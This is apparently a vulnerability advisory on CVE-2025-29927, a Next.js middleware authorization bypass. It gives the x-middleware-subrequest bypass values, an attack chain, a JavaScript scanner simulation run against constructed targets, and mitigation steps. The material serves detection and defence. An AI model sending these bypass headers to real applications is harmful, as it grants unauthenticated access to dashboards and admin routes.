OFFSITE.DARK

Jun 29, 2026


Sploitus

  • nextjs
  • middleware
  • auth-bypass
  • cve-2025-29927
  • metasploit

news

Next.js Middleware Authorization Bypass Scanner (CVE-2025-29927)

x-middleware-subrequest header skips middleware auth gates on self-hosted Next.js < 12.3.5 / 13.5.9 / 14.2.25 / 15.2.3 — CVSS 9.1.

Summary

CVE-2025-29927 is a critical authorization bypass in self-hosted Next.js middleware with CVSS 9.1. Rapid7's Metasploit module auxiliary/scanner/http/nextjs_middleware_auth_bypass detects vulnerable instances.

Next.js marks its own internal subrequests with the x-middleware-subrequest header and skips middleware when it sees that value, so the same middleware does not run again recursively. Before the fix the header was accepted from external clients as well, so an attacker who supplies the right value bypasses any authentication, authorization, or redirect logic implemented in middleware.

This is not CVE-2025-55182 (React2Shell, the React Server Components RCE); it is a separate middleware-trust flaw, discovered by zhero and inzo.

Affected self-hosted lines: < 12.3.5, < 13.5.9, < 14.2.25, < 15.2.3 (fixed in those patch releases).

Key Findings

Finding          Detail
CVE              CVE-2025-29927
Weakness         x-middleware-subrequest header trusted from external clients
Bypass payloads  Five-value recursion (middleware:middleware:…), src/middleware variants, single middleware, pages/_middleware
Scanner method   Differential: baseline gated path (401/403/redirect) vs. the same path with the header set
Module type      Detection only; does not act on the bypassed response
Disclosure       2025-03-21

Attack Chain

GET /dashboard (middleware-gated) → 401/403 or redirect to login
        ↓
GET /dashboard + x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
        ↓
Middleware skipped → protected page served (200) or redirect target changes
        ↓
Unauthenticated access to routes behind middleware auth

Next.js from roughly 13.2 onward counts how many times the middleware module name appears in the header and skips only when that count reaches MAX_RECURSION_DEPTH (5), hence the five-value payload; earlier versions skip on a single occurrence. The module name depends on the project layout (middleware, src/middleware, or pages/_middleware on older projects), so a scanner has to try each variant.
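The skip decision and the differential check described above, as an added JavaScript example. This is not the Metasploit module's code or Next.js source; the function names, the simulated targets and the `session=valid` cookie are constructions of this example, and only the header name, the payload shapes and the depth constant come from the disclosure.

```javascript
// Added example: models the pre-patch x-middleware-subrequest skip decision
// and the differential probe a scanner performs. Not Next.js or Metasploit
// code; every name here is this example's own.
const MAX_RECURSION_DEPTH = 5;           // value from the public disclosure
const HEADER = 'x-middleware-subrequest';

// Pre-patch skip decision, reduced to what matters. countsDepth=true models
// the newer code path (module name must repeat MAX_RECURSION_DEPTH times);
// false models older builds that skip on a single match.
function middlewareSkipped(headers, middlewareName, countsDepth) {
  const raw = headers[HEADER];
  const subrequests = typeof raw === 'string' ? raw.split(':') : [];
  if (!countsDepth) return subrequests.includes(middlewareName);
  const depth = subrequests.filter((s) => s === middlewareName).length;
  return depth >= MAX_RECURSION_DEPTH;
}

// Probe values covering the module names the advisory lists, each in single
// and five-repeat form, so one probe set spans every affected release line.
function bypassPayloads() {
  const names = ['middleware', 'src/middleware', 'pages/_middleware'];
  const out = [];
  for (const n of names) {
    out.push(n, Array(MAX_RECURSION_DEPTH).fill(n).join(':'));
  }
  return out;
}

// Constructed target whose only auth gate is middleware (the vulnerable
// pattern). Responses are reduced to { status, location }.
function simulateVulnerableApp(req, { middlewareName, countsDepth }) {
  const authed = req.headers.cookie === 'session=valid'; // constructed cookie
  if (!middlewareSkipped(req.headers, middlewareName, countsDepth) && !authed) {
    return { status: 307, location: '/login' };
  }
  return { status: 200, location: null };
}

// Same target where the header never reaches the middleware runner, which is
// the effect of both upgrading and stripping the header at a reverse proxy.
function simulatePatchedApp(req, opts) {
  const headers = { ...req.headers };
  delete headers[HEADER];
  return simulateVulnerableApp({ ...req, headers }, opts);
}

// A gated baseline is a 401/403 or a redirect; anything else has no gate
// for the header to skip.
function isGated(res) {
  if (res.status === 401 || res.status === 403) return true;
  return res.status >= 300 && res.status < 400;
}

// Differential verdict: the probe must change a gated baseline, either into
// a 200 or into a redirect to a different target.
function classify(baseline, probe) {
  if (!isGated(baseline)) return 'not-gated';
  if (probe.status === 200) return 'bypass';
  if (isGated(probe) && probe.location !== baseline.location) return 'bypass';
  return 'no-bypass';
}

// Detection only: report the first payload that flips the baseline verdict.
// sendRequest is any function mapping { path, headers } to a response.
function scan(sendRequest, path) {
  const baseline = sendRequest({ path, headers: {} });
  if (!isGated(baseline)) return { vulnerable: false, reason: 'baseline not gated' };
  for (const value of bypassPayloads()) {
    const probe = sendRequest({ path, headers: { [HEADER]: value } });
    if (classify(baseline, probe) === 'bypass') return { vulnerable: true, payload: value };
  }
  return { vulnerable: false, reason: 'no payload changed the response' };
}

// Stand-alone run against the constructed targets.
const modernTarget = (req) =>
  simulateVulnerableApp(req, { middlewareName: 'middleware', countsDepth: true });
const patchedTarget = (req) =>
  simulatePatchedApp(req, { middlewareName: 'middleware', countsDepth: true });
console.log(scan(modernTarget, '/dashboard'));
console.log(scan(patchedTarget, '/dashboard'));
```

Against a real host, `sendRequest` would issue the HTTP request without following redirects and return the status and Location header; the verdict logic stays the same. Note that the single-name payload is tried before the five-repeat form, so which payload triggers the hit also tells you which code path the target is running.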

Impact

Self-hosted Next.js apps that rely on middleware for auth (dashboards, admin panels, API route gates) are fully bypassable on vulnerable builds. Vercel-hosted deployments are not affected per vendor guidance.

Mitigation

  1. Upgrade to 12.3.5+, 13.5.9+, 14.2.25+, or 15.2.3+ depending on your release line; this is the actual fix.
  2. Strip or block the x-middleware-subrequest header at the reverse proxy or WAF so it never reaches the application, as defense in depth.
  3. Do not rely solely on middleware for security boundaries: enforce authentication and authorization in server components, route handlers and API handlers as well, so a skipped middleware run changes nothing.
